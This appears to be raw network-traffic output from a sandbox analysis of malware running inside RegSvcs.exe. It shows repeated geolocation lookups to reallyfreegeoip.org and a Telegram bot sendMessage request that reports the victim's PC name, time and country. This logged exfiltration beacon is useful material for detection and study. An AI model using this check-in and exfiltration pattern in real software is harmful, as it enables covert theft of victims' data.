                                                                    2024-09-25 13:34:16 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                    Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                    2024-09-25 13:34:16 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    4192.168.2.549712188.114.97.34436004C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-09-25 13:34:17 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                    Host: reallyfreegeoip.org
                                                                    Connection: Keep-Alive
                                                                    2024-09-25 13:34:18 UTC672INHTTP/1.1 200 OK
                                                                    Date: Wed, 25 Sep 2024 13:34:17 GMT
                                                                    Content-Type: application/xml
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    access-control-allow-origin: *
                                                                    vary: Accept-Encoding
                                                                    Cache-Control: max-age=86400
                                                                    CF-Cache-Status: HIT
                                                                    Age: 23316
                                                                    Last-Modified: Wed, 25 Sep 2024 07:05:41 GMT
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Rwal3WZpzOTvy2Ooy01S7wFrVTgesZaZM75kw4%2BXygDtjr6yHwQpKcJhChKPyWFCuIojCmKxENFX10PS50Mn43M7YGCSHLtNGRpAFxWLXp0yOmkcXoW5a06CjTueCOUZD3RPZxt2"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 8c8b64125c018cc5-EWR
                                                                    2024-09-25 13:34:18 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                    Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                    2024-09-25 13:34:18 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    5192.168.2.549714188.114.97.34436004C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-09-25 13:34:18 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                    Host: reallyfreegeoip.org
                                                                    Connection: Keep-Alive
                                                                    2024-09-25 13:34:19 UTC678INHTTP/1.1 200 OK
                                                                    Date: Wed, 25 Sep 2024 13:34:19 GMT
                                                                    Content-Type: application/xml
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    access-control-allow-origin: *
                                                                    vary: Accept-Encoding
                                                                    Cache-Control: max-age=86400
                                                                    CF-Cache-Status: HIT
                                                                    Age: 23318
                                                                    Last-Modified: Wed, 25 Sep 2024 07:05:41 GMT
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iHLvAQZof89dITE8bwIS7%2Bkpdr8vqho0sIMSoYxgKb3AryBmFwLCiT%2BWy9cuBm7CPYqvBMFWFQoPnXTCvsByWgbzVWqhLMlL66OI%2FH5Ez%2FW0LnAkLNvab7ceJetynPNnFdKULnKZ"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 8c8b641929654241-EWR
                                                                    2024-09-25 13:34:19 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                    Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                    2024-09-25 13:34:19 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    6192.168.2.549716188.114.97.34436004C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-09-25 13:34:20 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                    Host: reallyfreegeoip.org
                                                                    2024-09-25 13:34:20 UTC676INHTTP/1.1 200 OK
                                                                    Date: Wed, 25 Sep 2024 13:34:20 GMT
                                                                    Content-Type: application/xml
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    access-control-allow-origin: *
                                                                    vary: Accept-Encoding
                                                                    Cache-Control: max-age=86400
                                                                    CF-Cache-Status: HIT
                                                                    Age: 23319
                                                                    Last-Modified: Wed, 25 Sep 2024 07:05:41 GMT
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Km4yE3oKvJ5%2BBeaN46QA1AUumIDmivaoQ1gBxGCF5pcuy2Fc6Vrl90hZPoi5tIzPGmG9vScr85qHErHB6uq%2BjG9u9d7GhUo8QfKY%2BnKWJIzlEYXt6HPktIp62CqbZCTVNr6W93He"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 8c8b64203eb343aa-EWR
                                                                    2024-09-25 13:34:20 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                    Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                    2024-09-25 13:34:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    7192.168.2.549718188.114.97.34436004C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-09-25 13:34:21 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                    Host: reallyfreegeoip.org
                                                                    Connection: Keep-Alive
                                                                    2024-09-25 13:34:21 UTC688INHTTP/1.1 200 OK
                                                                    Date: Wed, 25 Sep 2024 13:34:21 GMT
                                                                    Content-Type: application/xml
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    access-control-allow-origin: *
                                                                    vary: Accept-Encoding
                                                                    Cache-Control: max-age=86400
                                                                    CF-Cache-Status: HIT
                                                                    Age: 23320
                                                                    Last-Modified: Wed, 25 Sep 2024 07:05:41 GMT
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XKGcBVq9xxnKZNC83%2BLJ82FMRzexO1EweJPHBR1Ndlm%2Fa%2F3qbsvdFNiQ3%2BrJ%2Fq9EhF36MzTmyQLaFHp3P2x%2Bx3hvehEZkwjmc8Ql6qc%2BQuoBJ1wgR%2FtRAoeHcHUa6OC4PjM1%2FS2J"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 8c8b642709c8429b-EWR
                                                                    2024-09-25 13:34:21 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                    Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                    2024-09-25 13:34:21 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    8192.168.2.549720188.114.97.34436004C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-09-25 13:34:22 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                    Host: reallyfreegeoip.org
                                                                    Connection: Keep-Alive
                                                                    2024-09-25 13:34:22 UTC678INHTTP/1.1 200 OK
                                                                    Date: Wed, 25 Sep 2024 13:34:22 GMT
                                                                    Content-Type: application/xml
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    access-control-allow-origin: *
                                                                    vary: Accept-Encoding
                                                                    Cache-Control: max-age=86400
                                                                    CF-Cache-Status: HIT
                                                                    Age: 23321
                                                                    Last-Modified: Wed, 25 Sep 2024 07:05:41 GMT
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DeBVWa00XKDqb1kNFNBXC8dwX2SocNpUfsVMc6k%2FOWM5584oWSZTSHcwA%2FxI4hOd3j8xnyOb7Qt3FCoQe%2Fd1wLCZolKGV09YsycG85TjX54HU6T1Xx6K%2Fjf1hx7LZBRiugCZ5AP6"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 8c8b642ddcb880da-EWR
                                                                    2024-09-25 13:34:22 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                    Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                    2024-09-25 13:34:22 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    9192.168.2.549722149.154.167.2204436004C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-09-25 13:34:23 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:921702%0D%0ADate%20and%20Time:%2025/09/2024%20/%2020:20:23%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20921702%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                    Host: api.telegram.org
                                                                    Connection: Keep-Alive
                                                                    2024-09-25 13:34:23 UTC344INHTTP/1.1 404 Not Found
                                                                    Server: nginx/1.18.0
                                                                    Date: Wed, 25 Sep 2024 13:34:23 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 55
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2024-09-25 13:34:23 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                    Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    10192.168.2.549729188.114.97.34436488C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-09-25 13:34:32 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                    Host: reallyfreegeoip.org
                                                                    Connection: Keep-Alive
                                                                    2024-09-25 13:34:32 UTC678INHTTP/1.1 200 OK
                                                                    Date: Wed, 25 Sep 2024 13:34:32 GMT
                                                                    Content-Type: application/xml
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    access-control-allow-origin: *
                                                                    vary: Accept-Encoding
                                                                    Cache-Control: max-age=86400
                                                                    CF-Cache-Status: HIT
                                                                    Age: 23331
                                                                    Last-Modified: Wed, 25 Sep 2024 07:05:41 GMT
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jboQZB5zUNjbvp7YZ%2F42hYxMphb%2BtfozQ67%2FbFkkPGIgoJEJA3jfn4rlsV4RPfEDkVYk7vCYvxmbO7FYfBrHsZHvIll0PIWjWv43%2BixacsFz2o4rZP94hk3ADBpN0R64zYG8PLgf"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 8c8b646b6fe24405-EWR
                                                                    2024-09-25 13:34:32 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                    Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                    2024-09-25 13:34:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    11192.168.2.549730188.114.97.34436488C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-09-25 13:34:32 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                    Host: reallyfreegeoip.org
                                                                    2024-09-25 13:34:33 UTC680INHTTP/1.1 200 OK
                                                                    Date: Wed, 25 Sep 2024 13:34:32 GMT
                                                                    Content-Type: application/xml
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    access-control-allow-origin: *
                                                                    vary: Accept-Encoding
                                                                    Cache-Control: max-age=86400
                                                                    CF-Cache-Status: HIT
                                                                    Age: 23331
                                                                    Last-Modified: Wed, 25 Sep 2024 07:05:41 GMT
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DUHTArL6vG1wS9koEaKNZiPqdpj9x2xbZ5BRhPdxbNcICAa8Vo01gKAIuPplOkcEb%2FqbQkXvLAGIjtQ6aWRfQeDYWJ0dY%2F8Ywxw1MGuI5H6v9a2%2FjQI%2BGwnp%2FT5WfksImIFBbain"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 8c8b646ffa2743be-EWR
                                                                    2024-09-25 13:34:33 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                    Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                    2024-09-25 13:34:33 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    12192.168.2.549732188.114.97.34436488C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-09-25 13:34:34 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                    Host: reallyfreegeoip.org
                                                                    Connection: Keep-Alive
                                                                    2024-09-25 13:34:34 UTC678INHTTP/1.1 200 OK
                                                                    Date: Wed, 25 Sep 2024 13:34:34 GMT
                                                                    Content-Type: application/xml
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    access-control-allow-origin: *
                                                                    vary: Accept-Encoding
                                                                    Cache-Control: max-age=86400
                                                                    CF-Cache-Status: HIT
                                                                    Age: 23333
                                                                    Last-Modified: Wed, 25 Sep 2024 07:05:41 GMT
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FiS1wvXXsgjUFkvMt8qo9b61rUdGTn74Cd9066PVpth%2F95UbVK%2FFw3oZoueSW4M8JodrUk3uKZVEcfRUU3cRp6TSGu5ax4uJZkOOfCbxgCFhuNfOv0dRMuM0%2FtivcgTERU%2Fo6O0q"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 8c8b6477eb341a28-EWR
                                                                    2024-09-25 13:34:34 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                    Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                    2024-09-25 13:34:34 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    13192.168.2.549734188.114.97.34436488C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-09-25 13:34:35 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                    Host: reallyfreegeoip.org
                                                                    Connection: Keep-Alive
                                                                    2024-09-25 13:34:35 UTC676INHTTP/1.1 200 OK
                                                                    Date: Wed, 25 Sep 2024 13:34:35 GMT
                                                                    Content-Type: application/xml
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    access-control-allow-origin: *
                                                                    vary: Accept-Encoding
                                                                    Cache-Control: max-age=86400
                                                                    CF-Cache-Status: HIT
                                                                    Age: 23334
                                                                    Last-Modified: Wed, 25 Sep 2024 07:05:41 GMT
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vERzl16CutZrQvlc14nlt6y1hOOOfrPMZxCphwRja8LtSqqjdbY6u1pi99IA4%2F9tFstcAM5ldx8PW8fWDUJW6cBKej%2BPepBwckfcpKNHGP0l%2F9XJApx6Yqizcx1qGdHpudPVbxzF"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 8c8b647fcac84245-EWR
